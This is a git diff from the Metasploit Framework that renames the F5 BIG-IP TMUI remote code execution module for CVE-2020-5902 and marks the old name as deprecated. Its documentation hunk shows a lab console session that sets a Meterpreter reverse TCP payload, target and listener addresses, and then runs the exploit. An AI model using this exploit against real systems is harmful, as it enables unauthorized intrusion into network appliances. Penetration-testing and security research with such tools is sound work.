diff --git a/documentation/modules/exploit/linux/http/f5_bigip_tmui_rce.md b/documentation/modules/exploit/linux/http/f5_bigip_tmui_rce_cve_2020_5902.md similarity index 93% rename from documentation/modules/exploit/linux/http/f5_bigip_tmui_rce.md rename to documentation/modules/exploit/linux/http/f5_bigip_tmui_rce_cve_2020_5902.md index 3308499060b2..f2b8c1206726 100644 --- a/documentation/modules/exploit/linux/http/f5_bigip_tmui_rce.md +++ b/documentation/modules/exploit/linux/http/f5_bigip_tmui_rce_cve_2020_5902.md @@ -52,11 +52,11 @@ Defaults to `/tmp`. ### F5 BIG-IP 14.1.2 in VMware Fusion ``` -msf5 > use exploit/linux/http/f5_bigip_tmui_rce +msf5 > use exploit/linux/http/f5_bigip_tmui_rce_cve_2020_5902 [*] Using configured payload linux/x64/meterpreter/reverse_tcp -msf5 exploit(linux/http/f5_bigip_tmui_rce) > options +msf5 exploit(linux/http/f5_bigip_tmui_rce_cve_2020_5902) > options -Module options (exploit/linux/http/f5_bigip_tmui_rce): +Module options (exploit/linux/http/f5_bigip_tmui_rce_cve_2020_5902): Name Current Setting Required Description ---- --------------- -------- ----------- @@ -87,11 +87,11 @@ Exploit target: 1 Linux Dropper -msf5 exploit(linux/http/f5_bigip_tmui_rce) > set rhosts 172.16.249.179 +msf5 exploit(linux/http/f5_bigip_tmui_rce_cve_2020_5902) > set rhosts 172.16.249.179 rhosts => 172.16.249.179 -msf5 exploit(linux/http/f5_bigip_tmui_rce) > set lhost 172.16.249.1 +msf5 exploit(linux/http/f5_bigip_tmui_rce_cve_2020_5902) > set lhost 172.16.249.1 lhost => 172.16.249.1 -msf5 exploit(linux/http/f5_bigip_tmui_rce) > run +msf5 exploit(linux/http/f5_bigip_tmui_rce_cve_2020_5902) > run [*] Started reverse TCP handler on 172.16.249.1:4444 [*] Executing automatic check (disable AutoCheck to override) diff --git a/modules/exploits/linux/http/f5_bigip_tmui_rce.rb b/modules/exploits/linux/http/f5_bigip_tmui_rce_cve_2020_5902.rb similarity index 98% rename from modules/exploits/linux/http/f5_bigip_tmui_rce.rb rename to modules/exploits/linux/http/f5_bigip_tmui_rce_cve_2020_5902.rb index f0574bde6073..b3e4d70f16a2 100644 --- a/modules/exploits/linux/http/f5_bigip_tmui_rce.rb +++ b/modules/exploits/linux/http/f5_bigip_tmui_rce_cve_2020_5902.rb @@ -11,6 +11,8 @@ class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager include Msf::Exploit::FileDropper + include Msf::Exploit::Deprecated + moved_from 'exploit/linux/http/f5_bigip_tmui_rce' def initialize(info = {}) super(